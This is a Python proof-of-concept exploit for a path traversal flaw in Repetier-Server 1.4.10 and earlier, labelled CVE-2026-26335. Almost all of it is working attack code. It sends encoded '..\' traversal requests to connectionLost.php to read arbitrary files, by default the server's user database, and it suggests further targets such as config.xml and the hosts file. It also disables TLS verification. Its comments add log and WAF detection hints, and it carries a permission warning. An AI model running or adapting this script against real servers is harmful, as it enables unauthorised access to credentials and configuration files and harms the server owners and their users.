Repetier-Server 1.4.10 Exploit, Path Traversal

# Exploit Title:    Repetier-Server 1.4.10 - Path Traversal
# Exploit Author:   Mohammed Idrees Banyamer
# Vendor Homepage:  https://www.repetier.com/
# Version:          <= 1.4.10
# Tested on:        Windows 10 / Windows Server 2019 (Repetier-Server default install)
# CVE:              CVE-2026-26335
# Advisory:         https://cybir.com/2023/cve/poc-repetier-server-140/ (related research)
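# CVSS:             9.8 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  (score and vector disagree: read as a CVSS v3.x vector, I:N/A:N scores 7.5 High; confirm against the CVE record before using either for triage)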

import requests
import argparse
import sys
from urllib.parse import urljoin


def generate_traversal(depth: int = 15) -> str:
    """Return ``depth`` copies of the ``..%5c`` parent-directory token.

    ``%5c`` is the percent-encoded backslash, so each token is an encoded
    ``..\\`` step. For defenders: a run of these tokens in a request URL is
    the signature this script leaves in web-server access logs.

    A ``depth`` of zero or less yields an empty string.
    """
    parent_step = "..%5c"
    return "".join(parent_step for _ in range(depth))


def attempt_read(target_url: str, file_path: str, traversal_depth: int = 15, timeout: int = 10) -> bool:
    """Send the two traversal request shapes and report whether either looks successful.

    Args:
        target_url: Base URL of the server under test; a trailing slash is normalised.
        file_path: File path with separators already percent-encoded by the caller.
        traversal_depth: Number of ``..%5c`` tokens placed in front of ``file_path``.
        timeout: Per-request timeout in seconds passed to ``requests.get``.

    Returns:
        True as soon as one request returns HTTP 200 with a body longer than
        60 bytes, otherwise False. This is a size heuristic only: it does not
        confirm that the body is the requested file, so a custom 200 error
        page of sufficient length would also be reported as a hit.

    Detection note: both request shapes reference ``base/connectionLost.php``
    and carry the ``..%5c`` run either in the URL path or in a ``file`` query
    parameter, which is what to search for in access logs or a WAF rule.
    """
    dot_run = generate_traversal(traversal_depth)

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    print(f"[*] Traversal depth: {traversal_depth}")

    base = target_url.rstrip("/") + "/"
    candidate_paths = (
        # Shape 1: traversal embedded in the URL path.
        f"views{dot_run}{file_path}/base/connectionLost.php",
        # Shape 2: traversal supplied through the ``file`` query parameter.
        f"base/connectionLost.php?file={dot_run}{file_path}",
    )

    for relative in candidate_paths:
        full_url = urljoin(base, relative)

        try:
            print(f"  → Trying: {full_url}")
            # NOTE(review): verify=False disables TLS certificate validation,
            # so the responding host is not authenticated.
            response = requests.get(full_url, timeout=timeout, verify=False)
            status = response.status_code
            body_len = len(response.content)

            if status != 200 or body_len <= 60:
                print(f"  → Failed (status {status}, size {body_len})")
                continue

            # Flatten newlines so the first 500 characters print on one line.
            preview = response.text[:500].replace("\n", " ").strip()
            print(f"[+] LIKELY SUCCESS (status {status}, {body_len} bytes)")
            print(f"    Preview:\n    {preview}...")
            return True

        except requests.RequestException as err:
            print(f"  → Error: {err}")

    return False


def main():
    """Parse the command line, run the read attempt and print the outcome.

    Options: a positional ``target`` base URL, ``--file`` (Windows-style path,
    defaulting to the Repetier-Server user database under ProgramData),
    ``--depth`` (number of traversal tokens) and ``--test``, which overrides
    ``--file`` with ``Windows\\win.ini``.

    Backslashes in the chosen path are percent-encoded to ``%5c`` before the
    request is built. The affected range stated in this file's header is
    Repetier-Server <= 1.4.10.
    """
    cli = argparse.ArgumentParser(
        description="CVE-2026-26335 PoC - Repetier-Server Path Traversal / LFI"
    )
    cli.add_argument("target", help="Target base URL (e.g. http://192.168.1.100:3344/)")
    cli.add_argument(
        "--file",
        default="ProgramData\\Repetier-Server\\database\\user.sql",
        help="File path to read (use Windows \\ separator)",
    )
    cli.add_argument("--depth", type=int, default=15, help="Traversal depth")
    cli.add_argument("--test", action="store_true", help="Quick test with Windows\\win.ini")

    opts = cli.parse_args()

    # --test takes precedence over whatever --file was given.
    requested = opts.file
    if opts.test:
        requested = "Windows\\win.ini"
        print("[i] Running test mode → targeting Windows\\win.ini")

    # Percent-encode every backslash so the separator survives URL handling.
    file_path = "%5c".join(requested.split("\\"))

    rule = "=" * 70
    print(rule)
    print("CVE-2026-26335 Exploit PoC - Repetier-Server <=1.4.10 Path Traversal")
    print("USE ONLY ON SYSTEMS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST!")
    print(rule, "\n")

    if attempt_read(opts.target, file_path, opts.depth):
        return

    failure_lines = (
        "\n[!] Exploitation attempt failed.",
        "Suggestions:",
        "  • Increase --depth (try 18–30)",
        "  • Verify target is running Repetier-Server <=1.4.10",
        "  • Try alternative interesting files:",
        "      - ProgramData%5cRepetier-Server%5cconfig.xml",
        "      - Windows%5csystem32%5cdrivers%5cetc%5chosts",
    )
    for line in failure_lines:
        print(line)


# Run the command-line entry point only when this file is executed as a
# script; importing the module triggers no network activity.
if __name__ == "__main__":
    main()
